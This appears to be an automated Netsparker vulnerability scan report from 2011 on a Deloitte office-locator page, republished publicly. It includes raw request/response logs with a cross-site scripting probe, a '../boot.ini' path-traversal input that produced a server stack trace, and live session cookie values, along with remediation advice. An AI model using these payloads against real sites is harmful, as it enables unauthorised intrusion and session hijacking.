XSS, DORK, GHDB, deloitte.com REPORT SUMMARY
Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search
XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Private Reporting of Security Research is preferred for Online Service Providers
Loading
Netsparker - Scan Report Summary
TARGET URL
https://www.deloitte.com/view/en_US/us/office...
SCAN DATE
6/20/2011 7:21:07 AM
REPORT DATE
6/20/2011 8:44:59 AM
SCAN DURATION
00:00:58
Total Requests
Average Speed
req/sec.
6
identified
4
confirmed
0
critical
1
informational
SCAN SETTINGS
Scan Settings
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled
VULNERABILITIES
Vulnerabilities
VULNERABILITY SUMMARY
Vulnerability Summary
Cross-site Scripting
Cross-site Scripting
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (
Javascript, VbScript ) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of XSS, including:
Hi-jacking users' active session
Changing the look of the page within the victims browser.
Mounting a successful phishing attack.
Intercept data and perform man-in-the-middle attacks.
The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.
External References
- /view/en_US/us/officelocator
Parameters
Parameter
Type
Value
key_OfficeCountry
GET
US
key_City
GET
Little Rock
Query Based
QUERYSTRING
'"--></style></script><script>alert(0x000013)</script>
Request
GET /view/en_US/us/officelocator?'"--></style></script><script>netsparker(0x000013)</script> HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.deloitte.com Cookie: JSESSIONID=02JSN17SwHNh42Zbc0LTgWklqLf7G3n7nvxf4vgvPKJ51WwS2YMG!-1257951137; BIGipServerwww64.deloitte.com=17297418.20480.0000 Accept-Encoding: gzip, deflate Connection: Keep-Alive
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET,Servlet/2.5 JSP/2.1 Cache-Control: no-cache Content-Type: text/html; charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Content-Encoding: Date: Mon, 20 Jun 2011 12:21:42 GMT Content-Length: 10806 Connection: keep-alive <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <link href="/vgn-ext-templating/common/styles/vgn-ext-templating.css" rel="stylesheet" type="text/css"/> <script language="javascript" src="/deloitte-ecm-cm-dpm-web/scripts/swfobject.js"></script> <title>Deloitte | Audit, Consulting, Financial Advisory, Risk Management and Tax Services</title> <meta name="ROBOTS" content="ALL" /> <meta name="keywords" content="united states, keyword test" /> <script language="javascript"><!-- var omniture_saccount="deloittecomnewplatformprod"; //--></script> <script language="javascript"><!-- //--></script> <meta name="google-site-verification" content="37DiFXQl6h4P5Sli3Kwlq6yI0x9NrOaonJKW2HZ5ELw" /> <script language="javascript"><!-- //--></script> <meta name="google-site-verification" content="Gu6klRlOEfSbh5kCdbEMLV4fiElG-azZi-6Isdi4R-s" /> <script language="javascript"><!-- //--></script> <meta http-equiv="pragma" content="no-cache" /> <meta http-equiv="cache-control" content="no-cache" /> <meta http-equiv="expires" content="0" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="description" content="US specific office locations description" /> <base target="_top" /> <script type="text/javascript" src="/deloitte-ecm-cm-dpm-web/scripts/jquery-1.3.2.min.js"></script> <script type="text/javascript" src="/deloitte-ecm-cm-dpm-web/common/hover/js/jtip2.js"></script> <script type="text/javascript" src="/deloitte-ecm-cm-dpm-web/common/hover/js/jquery.cluetip.js"></script> <script type="text/javascript" src="/deloitte-ecm-cm-dpm-web/common/hover/js/jquery.hoverIntent.js"></script> <script type="text/javascript" src="/deloitte-ecm-cm-dpm-web/common/hover/js/jquery.platform.js"></script> <link rel="stylesheet" href="/deloitte-ecm-cm-dpm-web/common/hover/css/jquery.cluetip.css" type="text/css" /> <script type="text/javascript"> <!-- if (/Firefox[\/\s](\d+\.\d+)/.test(navigator.userAgent)){ //test for Firefox/x.x or Firefox x.x (ignoring remaining digits); document.write('<link rel=stylesheet href="/deloitte-ecm-cm-dpm-web/css/dcom/firefox/dtt-portal-dcom-global.css" type="text/css">'); } else if (/MSIE (\d+\.\d+);/.test(navigator.userAgent)){ //test for MSIE x.x; document.write('<link rel=stylesheet href="/deloitte-ecm-cm-dpm-web/css/dcom/internetExplorer/dtt-portal-dcom-global.css" type="text/css">'); } else if (/Chrome[\/\s](\d+\.\d+)/.test(navigator.userAgent)) {//test for Chrome/x.x or Chrome x.x (ignoring remaining digits); document.write('<link rel=stylesheet href="/deloitte-ecm-cm-dpm-web/css/dcom/chrome/dtt-portal-dcom-global.css" type="text/css">'); } else if (/Safari[\/\s](\d+\.\d+)/.test(navigator.userAgent)) {//test for Safari/x.x or Safari x.x (ignoring remaining digits); document.write('<link rel=stylesheet href="/deloitte-ecm-cm-dpm-web/css/dcom/safari/dtt-portal-dcom-global.css" type="text/css">'); } else{ document.write('<link rel=stylesheet href="/deloitte-ecm-cm-dpm-web/css/dcom/internetExplorer/dtt-portal-dcom-global.css" type="text/css">'); } //--> </script> <link id="defaultCssLink" rel=stylesheet href="/deloitte-ecm-cm-dpm-web/css/dcom/internetExplorer/dtt-portal-dcom-global.css" type="text/css"> <script language="javascript"> <!-- var defaultCss = document.getElementById('defaultCssLink'); if(defaultCss != null){ defaultCss.parentNode.removeChild(defaultCss); } var versionNumber = ((navigator.appName=='Microsoft Internet Explorer')?parseFloat((new RegExp("MSIE ([0-9]{1,}[.0-9]{0,})")).exec(navigator.userAgent)[1]):-1); document.write("<span id='browserVersionNumber'>" + versionNumber + "</span>"); //--> </script> <script language="javascript" src="/deloitte-ecm-cm-dpm-web/scripts/eventDisplayTime.js" type="text/javascript"></script> <script language="javascript" src="/deloitte-ecm-cm-dpm-web/scripts/custom-form-elements.js" type="text/javascript"></script> </head> <body> <script language="javascript" src="/deloitte-ecm-cm-dpm-web/scripts/s_code.js"></script> <script language="javascript" src="/deloitte-ecm-cm-dpm-web/scripts/printFormatScript.js"></script> <script language="javascript" src="/deloitte-ecm-cm-dpm-web/scripts/dcom/pageActions.js"></script> <script language="javascript" src="/portal/jslib/form_state_manager.js"></script> <div class='container' id='utilityPage'> <div id="header"> <a href="https://www.deloitte.com/view/en_US/us/index.htm"><img src="/deloitte-ecm-cm-dpm-web/images/dcom/new_deloitte_logo.gif" alt="Deloitte United States" title="Deloitte United States" name="logo" border="0" id="logo" /></a> <ul id="menuPrimary"> <li > <a href="/view/en_US/us/Services/index.htm">Services</a></li> <li > <a href="/view/en_US/us/Industries/index.htm">Industries</a></li> <li > <a href="/view/en_US/us/Insights/index.htm">Insights</a></li> <li > <a href="/view/en_US/us/Careers/index.htm">Careers</a></li> </ul> <ul id="menuSecondary"> <li > <a href="/view/en_US/us/About/index.htm">About</a></li> <li > <a href="/view/en_US/us/press/index.htm">Press</a></li> <li > <a href="/view/en_US/us/Events-Deloitte/index.htm">Events</a></li> <li > <a href="/view/en_US/us/Alumni/index.htm">Alumni</a></li> <li > <a href="https://er0.deloitteonline.com/dol/login.aspx"target='_blank'>Clients</a></li> <li class = "lastMenuSecondary" > <a href="/view/en_US/us/Contact-us/index.htm">Contact</a></li> </ul> </div> <div id="breadcrumbs"> <a href='/view/en_GX/global/index.htm' title='Global'>Global</a> > <a href='/view/en_US/us/index.htm' title='United States'>United States</a> </div> <script language="javascript"> s.hier3 = "Global>United States"; s.pageName = "Global >United States"; </script> <div id="languageLinksDiv" > <div id="languageLinks"> </div> </div> <div id="preheader"> <script language="javascript"> function processSiteChange( cbo ){ var siteSelectorObj = document.getElementById("siteSelectorList"); //alert(siteSelectorObj.id) var selectedValue = siteSelectorObj.options[ siteSelectorObj.selectedIndex ].value; if(selectedValue != '0'){ window.location = siteSelectorObj.options[ siteSelectorObj.selectedIndex ].value; } } function submitOnEnter (e) { var ENTER_KEY = 13; var code = ""; if (window.event) // IE { code = e.keyCode; } else if (e.which) // Netscape/Firefox/Opera { code = e.which; } if (code == ENTER_KEY) { processSiteChange(); return false; } } </script> <div id="siteSelector"> <p id="siteSelected"> <select id="siteSelectorList" name="siteSelectorList" onkeypress="return submitOnEnter(event);" > <option value='0' selected >Global site selector</option> <option value='https://www.deloitte.com/view/en_GX/global/index.htm'>Global</option> <option value='https://www.deloitte.com/view/en_AL/al/index.htm'>Albania</option> <option value='https://www.deloitte.com/view/es_AR/ar/index.htm'>Argentina</option> <option value='https://www.deloitte.com/view/en_AU/au/index.htm'>Australia</option> <option value='https://www.deloitte.com/view/de_AT/at/index.htm'>Austria</option> <option value='https://www.deloitte.com/view/en_AZ/az/index.htm'>Azerbaijan</option> <option value='https://www.deloitte.com/view/en_BS/bs/index.htm'>Bahamas</option> <option value='https://www.deloitte.com/view/en_BH/bh/index.htm'>Bahrain</option> <option value='https://www.deloitte.com/view/en_BB/bb/index.htm'>Barbados</option> <option value='https://www.deloitte.com/view/ru_BY/by/index.htm'>Belarus</option> <option value='https://www.deloitte.com/view/en_BE/be/index.htm'>Belgium</option> <option value='https://www.deloitte.com/view/en_BM/bm/index.htm'>Bermuda</option> <option value='https://www.deloitte.com/view/en_BA/ba/index.htm'>Bosnia and Herzegovina</option> <option value='https://www.deloitte.com/view/pt_BR/br/index.htm'>Brazil</option> <option value='https://www.deloitte.com/view/en_VG/vg/index.htm'>British Virgin Islands</option> <option value='https://www.deloitte.com/view/en_BN/bn/index.htm'>Brunei Darussalam</option> <option value='https://www.deloitte.com/view/bg_BG/bg/index.htm'>Bulgaria</option> <option value='https://www.deloitte.com/view/en_CA/ca/index.htm'>Canada</option> <option value='https://www.deloitte.com/view/en_KY/ky/index.htm'>Cayman Islands</option> <option value='https://www.deloitte.com/view/en_XB/xb/index.htm'>Channel Islands and Isle of Man</option> <option value='https://www.deloitte.com/view/es_CL/cl/index.htm'>Chile</option> <option value='https://www.deloitte.com/view/zh_CN/cn/index.htm'>China</option> <option value='https://www.deloitte.com/view/es_CO/co/index.htm'>Colombia</option> <option value='https://www.deloitte.com/view/es_CR/cr/index.htm'>Costa Rica</option> <option value='https://www.deloitte.com/view/hr_HR/hr/index.htm'>Croatia</option> <option value='https://www.deloitte.com/view/en_CY/cy/index.htm'>Cyprus</option> <option value='https://www.deloitte.com/view/cs_CZ/cz/index.htm'>Czech Republic</option> <option value='https://www.deloitte.com/view/da_DK/dk/index.htm'>Denmark</option> <option value='https://www.deloitte.com/view/es_DO/do/index.htm'>Dominican Republic</option> <option value='https://www.deloitte.com/view/en_AN/an/index.htm'>Dutch Caribbean</option> <option value='https://www.deloitte.com/view/es_EC/ec/index.htm'>Ecuador</option> <option value='https://www.deloitte.com/view/en_EG/eg/index.htm'>Egypt</option> <option value='https://www.deloitte.com/view/es_SV/sv/index.htm'>El Salvador</option> <option value='https://www.deloitte.com/view/et_EE/ee/index.htm'>Estonia</option> <option value='https://www.deloitte.com/view/fi_FI/fi/index.htm'>Finland</option> <option value='https://www.deloitte.com/view/fr_FR/fr/index.htm'>France</option> <option value='https://www.deloitte.com/view/en_MK/mk/index.htm'>FYR Macedonia</option> <option value='https://www.deloitte.com/view/en_GE/ge/index.htm'>Georgia</option> <option value='https://www.deloitte.com/view/de_DE/de/index.htm'>Germany</option> <option value='https://www.deloitte.com/view/en_GR/gr/index.htm'>Greece</option> <option value='https://www.deloitte.com/view/en_GU/gu/index.htm'>Guam</option> <option value='https://www.deloitte.com/view/es_GT/gt/index.htm'>Guatemala</option> <option value='https://www.deloitte.com/view/es_HN/hn/index.htm'>Honduras</option> <option value='/cn'>Hong Kong SAR</option> <option value='https://www.deloitte.com/view/hu_HU/hu/index.htm'>Hungary</option> <option value='https://www.deloitte.com/view/is_IS/is/index.htm'>Iceland</option> <option value='https://www.deloitte.com/view/en_IN/in/index.htm'>India</option> <option value='https://www.deloitte.com/view/en_ID/id/index.htm'>Indonesia</option> <option value='https://www.deloitte.com/view/en_IE/ie/index.htm'>Ireland</option> <option value='https://www.deloitte.com/view/en_XD/xd/index.htm'>Islamic Finance</option> <option value='/xb'>Isle of Man and Channel Islands</option> <option value='https://www.deloitte.com/view/en_IL/il/index.htm'>Israel</option> <option value='https://www.deloitte.com/view/it_IT/it/index.htm'>Italy</option> <option value='https://www.deloitte.com/view/en_JM/jm/index.htm'>Jamaica</option> <option value='https://www.tohmatsu.com/view/ja_JP/jp/index.htm'>Japan</option> <option value='https://www.deloitte.com/view/en_JO/jo/index.htm'>Jordan</option> <option value='https://www.deloitte.com/view/en_KZ/kz/index.htm'>Kazakhstan</option> <option value='https://www.deloitte.com/view/en_KE/ke/index.htm'>Kenya</option> <option value='https://www.deloitte.com/view/ko_KR/kr/index.htm'>Korea</option> <option value='https://www.deloitte.com/view/en_KW/kw/index.htm'>Kuwait</option> <option value='https://www.deloitte.com/view/ru_KG/kg/index.htm'>Kyrgyzstan</option> <option value='https://www.deloitte.com/view/en_LV/lv/index.htm'&g..
Cookie Not Marked As Secure
Cookie Not Marked As Secure
A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (
Man in the middle ) attack.
Impact
This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie ) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.
Actions to Take
See the remedy for solution.
Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure. ))
Mark all cookies used within the application as secure.
Required Skills for Successful Exploitation
To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to ) to a system between the victim and the web server.
- /view/en_US/us/officelocator
VignettePortal-NavTreeState-dcom
Request
GET /view/en_US/us/officelocator?key_OfficeCountry=US&key_City=Little+Rock HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.deloitte.com Accept-Encoding: gzip, deflate Connection: Keep-Alive
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET,Servlet/2.5 JSP/2.1 Cache-Control: no-cache,no-cache="set-cookie" Content-Type: text/html; charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Content-Encoding: Content-Length: 10976 Date: Mon, 20 Jun 2011 12:21:08 GMT Connection: keep-alive Set-Cookie: VignettePortal-NavTreeState-dcom=; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/,JSESSIONID=02JSN17SwHNh42Zbc0LTgWklqLf7G3n7nvxf4vgvPKJ51WwS2YMG!-1257951137; path=/; HttpOnly=,BIGipServerwww64.deloitte.com=17297418.20480.0000; path=/ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <link href="/vgn-ext-templating/common/styles/vgn-ext-templating.css" rel="stylesheet" type="text/css"/> <script language="javascript" src="/deloitte-ecm-cm-dpm-web/scripts/swfobject.js"></script> <title>Deloitte | Audit, Consulting, Financial Advisory, Risk Management and Tax Services</title> <meta name="ROBOTS" content="ALL" /> <meta name="keywords" content="united states, keyword test" /> <script language="javascript"><!-- var omniture_saccount="deloittecomnewplatformprod"; //--></script> <script language="javascript"><!-- //--></script> <meta name="google-site-verification" content="37DiFXQl6h4P5Sli3Kwlq6yI0x9NrOaonJKW2HZ5ELw" /> <script language="javascript"><!-- //--></script> <meta name="google-site-verification" content="Gu6klRlOEfSbh5kCdbEMLV4fiElG-azZi-6Isdi4R-s" /> <script language="javascript"><!-- //--></script> <meta http-equiv="pragma" content="no-cache" /> <meta http-equiv="cache-control" content="no-cache" /> <meta http-equiv="expires" content="0" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="description" content="US specific office locations description" /> <base target="_top" /> <script type="text/javascript" src="/deloitte-ecm-cm-dpm-web/scripts/jquery-1.3.2.min.js"></script> <script type="text/javascript" src="/deloitte-ecm-cm-dpm-web/common/hover/js/jtip2.js"></script> <script type="text/javascript" src="/deloitte-ecm-cm-dpm-web/common/hover/js/jquery.cluetip.js"></script> <script type="text/javascript" src="/deloitte-ecm-cm-dpm-web/common/hover/js/jquery.hoverIntent.js"></script> <script type="text/javascript" src="/deloitte-ecm-cm-dpm-web/common/hover/js/jquery.platform.js"></script> <link rel="stylesheet" href="/deloitte-ecm-cm-dpm-web/common/hover/css/jquery.cluetip.css" type="text/css" /> <script type="text/javascript"> <!-- if (/Firefox[\/\s](\d+\.\d+)/.test(navigator.userAgent)){ //test for Firefox/x.x or Firefox x.x (ignoring remaining digits); document.write('<link rel=stylesheet href="/deloitte-ecm-cm-dpm-web/css/dcom/firefox/dtt-portal-dcom-global.css" type="text/css">'); } else if (/MSIE (\d+\.\d+);/.test(navigator.userAgent)){ //test for MSIE x.x; document.write('<link rel=stylesheet href="/deloitte-ecm-cm-dpm-web/css/dcom/internetExplorer/dtt-portal-dcom-global.css" type="text/css">'); } else if (/Chrome[\/\s](\d+\.\d+)/.test(navigator.userAgent)) {//test for Chrome/x.x or Chrome x.x (ignoring remaining digits); document.write('<link rel=stylesheet href="/deloitte-ecm-cm-dpm-web/css/dcom/chrome/dtt-portal-dcom-global.css" type="text/css">'); } else if (/Safari[\/\s](\d+\.\d+)/.test(navigator.userAgent)) {//test for Safari/x.x or Safari x.x (ignoring remaining digits); document.write('<link rel=stylesheet href="/deloitte-ecm-cm-dpm-web/css/dcom/safari/dtt-portal-dcom-global.css" type="text/css">'); } else{ document.write('<link rel=stylesheet href="/deloitte-ecm-cm-dpm-web/css/dcom/internetExplorer/dtt-portal-dcom-global.css" type="text/css">'); } //--> </script> <link id="defaultCssLink" rel=stylesheet href="/deloitte-ecm-cm-dpm-web/css/dcom/internetExplorer/dtt-portal-dcom-global.css" type="text/css"> <script language="javascript"> <!-- var defaultCss = document.getElementById('defaultCssLink'); if(defaultCss != null){ defaultCss.parentNode.removeChild(defaultCss); } var versionNumber = ((navigator.appName=='Microsoft Internet Explorer')?parseFloat((new RegExp("MSIE ([0-9]{1,}[.0-9]{0,})")).exec(navigator.userAgent)[1]):-1); document.write("<span id='browserVersionNumber'>" + versionNumber + "</span>"); //--> </script> <script language="javascript" src="/deloitte-ecm-cm-dpm-web/scripts/eventDisplayTime.js" type="text/javascript"></script> <script language="javascript" src="/deloitte-ecm-cm-dpm-web/scripts/custom-form-elements.js" type="text/javascript"></script> </head> <body> <script language="javascript" src="/deloitte-ecm-cm-dpm-web/scripts/s_code.js"></script> <script language="javascript" src="/deloitte-ecm-cm-dpm-web/scripts/printFormatScript.js"></script> <script language="javascript" src="/deloitte-ecm-cm-dpm-web/scripts/dcom/pageActions.js"></script> <script language="javascript" src="/portal/jslib/form_state_manager.js"></script> <div class='container' id='utilityPage'> <div id="header"> <a href="https://www.deloitte.com/view/en_US/us/index.htm"><img src="/deloitte-ecm-cm-dpm-web/images/dcom/new_deloitte_logo.gif" alt="Deloitte United States" title="Deloitte United States" name="logo" border="0" id="logo" /></a> <ul id="menuPrimary"> <li > <a href="/view/en_US/us/Services/index.htm">Services</a></li> <li > <a href="/view/en_US/us/Industries/index.htm">Industries</a></li> <li > <a href="/view/en_US/us/Insights/index.htm">Insights</a></li> <li > <a href="/view/en_US/us/Careers/index.htm">Careers</a></li> </ul> <ul id="menuSecondary"> <li > <a href="/view/en_US/us/About/index.htm">About</a></li> <li > <a href="/view/en_US/us/press/index.htm">Press</a></li> <li > <a href="/view/en_US/us/Events-Deloitte/index.htm">Events</a></li> <li > <a href="/view/en_US/us/Alumni/index.htm">Alumni</a></li> <li > <a href="https://er0.deloitteonline.com/dol/login.aspx"target='_blank'>Clients</a></li> <li class = "lastMenuSecondary" > <a href="/view/en_US/us/Contact-us/index.htm">Contact</a></li> </ul> </div> <div id="breadcrumbs"> <a href='/view/en_GX/global/index.htm' title='Global'>Global</a> > <a href='/view/en_US/us/index.htm' title='United States'>United States</a> </div> <script language="javascript"> s.hier3 = "Global>United States"; s.pageName = "Global >United States"; </script> <div id="languageLinksDiv" > <div id="languageLinks"> </div> </div> <div id="preheader"> <script language="javascript"> function processSiteChange( cbo ){ var siteSelectorObj = document.getElementById("siteSelectorList"); //alert(siteSelectorObj.id) var selectedValue = siteSelectorObj.options[ siteSelectorObj.selectedIndex ].value; if(selectedValue != '0'){ window.location = siteSelectorObj.options[ siteSelectorObj.selectedIndex ].value; } } function submitOnEnter (e) { var ENTER_KEY = 13; var code = ""; if (window.event) // IE { code = e.keyCode; } else if (e.which) // Netscape/Firefox/Opera { code = e.which; } if (code == ENTER_KEY) { processSiteChange(); return false; } } </script> <div id="siteSelector"> <p id="siteSelected"> <select id="siteSelectorList" name="siteSelectorList" onkeypress="return submitOnEnter(event);" > <option value='0' selected >Global site selector</option> <option value='https://www.deloitte.com/view/en_GX/global/index.htm'>Global</option> <option value='https://www.deloitte.com/view/en_AL/al/index.htm'>Albania</option> <option value='https://www.deloitte.com/view/es_AR/ar/index.htm'>Argentina</option> <option value='https://www.deloitte.com/view/en_AU/au/index.htm'>Australia</option> <option value='https://www.deloitte.com/view/de_AT/at/index.htm'>Austria</option> <option value='https://www.deloitte.com/view/en_AZ/az/index.htm'>Azerbaijan</option> <option value='https://www.deloitte.com/view/en_BS/bs/index.htm'>Bahamas</option> <option value='https://www.deloitte.com/view/en_BH/bh/index.htm'>Bahrain</option> <option value='https://www.deloitte.com/view/en_BB/bb/index.htm'>Barbados</option> <option value='https://www.deloitte.com/view/ru_BY/by/index.htm'>Belarus</option> <option value='https://www.deloitte.com/view/en_BE/be/index.htm'>Belgium</option> <option value='https://www.deloitte.com/view/en_BM/bm/index.htm'>Bermuda</option> <option value='https://www.deloitte.com/view/en_BA/ba/index.htm'>Bosnia and Herzegovina</option> <option value='https://www.deloitte.com/view/pt_BR/br/index.htm'>Brazil</option> <option value='https://www.deloitte.com/view/en_VG/vg/index.htm'>British Virgin Islands</option> <option value='https://www.deloitte.com/view/en_BN/bn/index.htm'>Brunei Darussalam</option> <option value='https://www.deloitte.com/view/bg_BG/bg/index.htm'>Bulgaria</option> <option value='https://www.deloitte.com/view/en_CA/ca/index.htm'>Canada</option> <option value='https://www.deloitte.com/view/en_KY/ky/index.htm'>Cayman Islands</option> <option value='https://www.deloitte.com/view/en_XB/xb/index.htm'>Channel Islands and Isle of Man</option> <option value='https://www.deloitte.com/view/es_CL/cl/index.htm'>Chile</option> <option value='https://www.deloitte.com/view/zh_CN/cn/index.htm'>China</option> <option value='https://www.deloitte.com/view/es_CO/co/index.htm'>Colombia</option> <option value='https://www.deloitte.com/view/es_CR/cr/index.htm'>Costa Rica</option> <option value='https://www.deloitte.com/view/hr_HR/hr/index.htm'>Croatia</option> <option value='https://www.deloitte.com/view/en_CY/cy/index.htm'>Cyprus</option> <option value='https://www.deloitte.com/view/cs_CZ/cz/index.htm'>Czech Republic</option> <option value='https://www.deloitte.com/view/da_DK/dk/index.htm'>Denmark</option> <option value='https://www.deloitte.com/view/es_DO/do/index.htm'>Dominican Republic</option> <option value='https://www.deloitte.com/view/en_AN/an/index.htm'>Dutch Caribbean</option> <option value='https://www.deloitte.com/view/es_EC/ec/index.htm'>Ecuador</option> <option value='https://www.deloitte.com/view/en_EG/eg/index.htm'>Egypt</option> <option value='https://www.deloitte.com/view/es_SV/sv/index.htm'>El Salvador</option> <option value='https://www.deloitte.com/view/et_EE/ee/index.htm'>Estonia</option> <option value='https://www.deloitte.com/view/fi_FI/fi/index.htm'>Finland</option> <option value='https://www.deloitte.com/view/fr_FR/fr/index.htm'>France</option> <option value='https://www.deloitte.com/view/en_MK/mk/index.htm'>FYR Macedonia</option> <option value='https://www.deloitte.com/view/en_GE/ge/index.htm'>Georgia</option> <option value='https://www.deloitte.com/view/de_DE/de/index.htm'>Germany</option> <option value='https://www.deloitte.com/view/en_GR/gr/index.htm'>Greece</option> <option value='https://www.deloitte.com/view/en_GU/gu/index.htm'>Guam</option> <option value='https://www.deloitte.com/view/es_GT/gt/index.htm'>Guatemala</option> <option value='https://www.deloitte.com/view/es_HN/hn/index.htm'>Honduras</option> <option value='/cn'>Hong Kong SAR</option> <option value='https://www.deloitte.com/view/hu_HU/hu/index.htm'>Hungary</option> <option value='https://www.deloitte.com/view/is_IS/is/index.htm'>Iceland</option> <option value='https://www.deloitte.com/view/en_IN/in/index.htm'>India</option> <option value='https://www.deloitte.com/view/en_ID/id/index.htm'>Indonesia</option> <option value='https://www.deloitte.com/view/en_IE/ie/index.htm'>Ireland</option> <option value='https://www.deloitte.com/view/en_XD/xd/index.htm'>Islamic Finance</option> <option value='/xb'>Isle of Man and Channel Islands</option> <option value='https://www.deloitte.com/view/en_IL/il/index.htm'>Israel</option> <option value='https://www.deloitte.com/view/it_IT/it/index.htm'>Italy</option> <option value='https://www.deloitte.com/view/en_JM/jm/index.htm'>Jamaica</option> <option value='https://www.tohmatsu.com/view/ja_JP/jp/index.htm'>Japan</option> <option value='https://www.deloitte.com/view/en_JO/jo/index.htm'>Jordan</option> <option value='https://www.deloitte.com/view/en_KZ/kz/index.htm'>Kazakhstan</option> <option value='https://www.deloitte.com/view/en_KE/ke/index.htm'>Kenya</option> <option value='https://www.deloitte.com/view/ko_KR/kr/index.htm'>Korea</option> <option value='https://www.deloitte.com/view/en_KW/kw/index...
Internal Server Error
Internal Server Error
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.
Impact
The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.
Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /view/en_US/us/officelocator
Parameters
Parameter
Type
Value
key_OfficeCountry
GET
../../../../../../../../../../boot.ini
key_City
GET
Little Rock
Request
GET /view/en_US/us/officelocator?key_OfficeCountry=../../../../../../../../../../boot.ini&key_City=Little+Rock HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.deloitte.com Cookie: JSESSIONID=02JSN17SwHNh42Zbc0LTgWklqLf7G3n7nvxf4vgvPKJ51WwS2YMG!-1257951137; BIGipServerwww64.deloitte.com=17297418.20480.0000 Accept-Encoding: gzip, deflate Connection: Keep-Alive
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET,Servlet/2.5 JSP/2.1 Content-Type: text/html Vary: Accept-Encoding Content-Encoding: Date: Mon, 20 Jun 2011 12:21:18 GMT Transfer-Encoding: chunked Connection: keep-alive,Transfer-Encoding <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN"><HTML><HEAD><TITLE>Error 500--Internal Server Error</TITLE><META NAME="GENERATOR" CONTENT="WebLogic Server"></HEAD><BODY bgcolor="white"><FONT FACE=Helvetica><BR CLEAR=all><TABLE border=0 cellspacing=5><TR><TD><BR CLEAR=all><FONT FACE="Helvetica" COLOR="black" SIZE="3"><H2>Error 500--Internal Server Error</H2></FONT></TD></TR></TABLE><TABLE border=0 width=100% cellpadding=10><TR><TD VALIGN=top WIDTH=100% BGCOLOR=white><FONT FACE="Courier New"><pre>java.lang.NullPointerException at com.vignette.ext.furl.servlet.UrlMapperServlet.redirectForward(UrlMapperServlet.java:363) at com.vignette.ext.furl.servlet.UrlMapperServlet.processRequest(UrlMapperServlet.java:322) at com.vignette.ext.furl.servlet.UrlMapperServlet.doRequest(UrlMapperServlet.java:144) at com.vignette.ext.furl.servlet.UrlMapperServlet.doGet(UrlMapperServlet.java:98) at javax.servlet.http.HttpServlet.service(HttpServlet.java:707) at javax.servlet.http.HttpServlet.__AW_service(HttpServlet.java:820) at javax.servlet.http.HttpServlet.service(HttpServlet.java) at weblogic.servlet.internal.StubSecurityHelper$ServletServiceAction.run(StubSecurityHelper.java:226) at weblogic.servlet.internal.StubSecurityHelper.invokeServlet(StubSecurityHelper.java:124) at weblogic.servlet.internal.ServletStubImpl.execute(ServletStubImpl.java:283) at weblogic.servlet.internal.TailFilter.doFilter(TailFilter.java:26) at weblogic.servlet.internal.FilterChainImpl.doFilter(FilterChainImpl.java:42) at com.deloitte.portal.controller.DisableUrlSessionFilter.doFilter(DisableUrlSessionFilter.java:49) at weblogic.servlet.internal.FilterChainImpl.doFilter(FilterChainImpl.java:42) at 